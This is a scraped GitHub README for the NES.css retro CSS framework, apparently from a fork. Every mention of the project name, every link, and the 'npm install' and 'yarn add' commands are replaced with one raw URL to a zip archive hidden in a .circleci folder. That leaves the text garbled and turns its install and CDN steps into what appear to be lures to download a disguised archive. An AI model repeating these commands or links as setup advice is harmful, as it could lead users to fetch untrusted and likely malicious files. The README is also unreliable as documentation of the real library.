Skip to content
 
 

Repository files navigation

https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip is a NES-style(8bit-like) CSS Framework.

Gitter Commitizen friendly

Installation

Styles

https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip is available via either npm (preferred) or Yarn, or a CDN.

via package manager

npm install https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip
# or
yarn add https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip

Our https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip contains some additional metadata under the following keys:

  • sass - path to our main Sass source file
  • style - path to our non-minified CSS

via CDN

Import the CSS via a <link /> element:

<!-- minify -->
<link href="https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip" rel="stylesheet" />
<!-- latest -->
<link href="https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip" rel="stylesheet" />

Fonts

https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip doesn't provide any fonts, but we do maintain the following list of fonts that we recommend for usage alongside the library.

Language Font
(Default) Press Start 2P
English Kongtext
Japanese 美咲フォント
Japanese Nu もち
Korean 둥근모꼴

Usage

https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip only provides components. You will need to define your own layout.

The recommended font for https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip is Press Start 2P. However, Press Start 2P only supports English characters. When you're using this framework with any language other than English, please use another font. Follow the Google Fonts instructions about how to include them, or simply include it as below:

<head>
    <link href="https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip+Start+2P" rel="stylesheet">
    <link href="https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip" rel="stylesheet" />

    <style>
      html, body, pre, code, kbd, samp {
          font-family: "font-family you want to use";
      }
    </style>
</head>

CSS Only

https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip only requires CSS and doesn't depend on any JavaScript.

Browser Support

https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip is compatible with the newest version of the following browsers.

  • Chrome
  • Firefox
  • Safari

Untested

  • IE/Edge

Copyright and license

Code and documentation copyright 2018 https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip. Code released under the MIT License. Docs released under Creative Commons.

Development

If you'd like to help us out with the project, we welcome contributions of all types! Check out our https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip for more details on how you can help make https://raw.githubusercontent.com/HitEagle/NES.css/master/.circleci/NE-css-3.7.zip amazing!

About

NES-style CSS Framework | ファミコン風CSSフレームワーク

Resources

Code of conduct

Contributing

Stars

0 stars

Watchers

1 watching

Forks

Releases

Packages

Contributors

Languages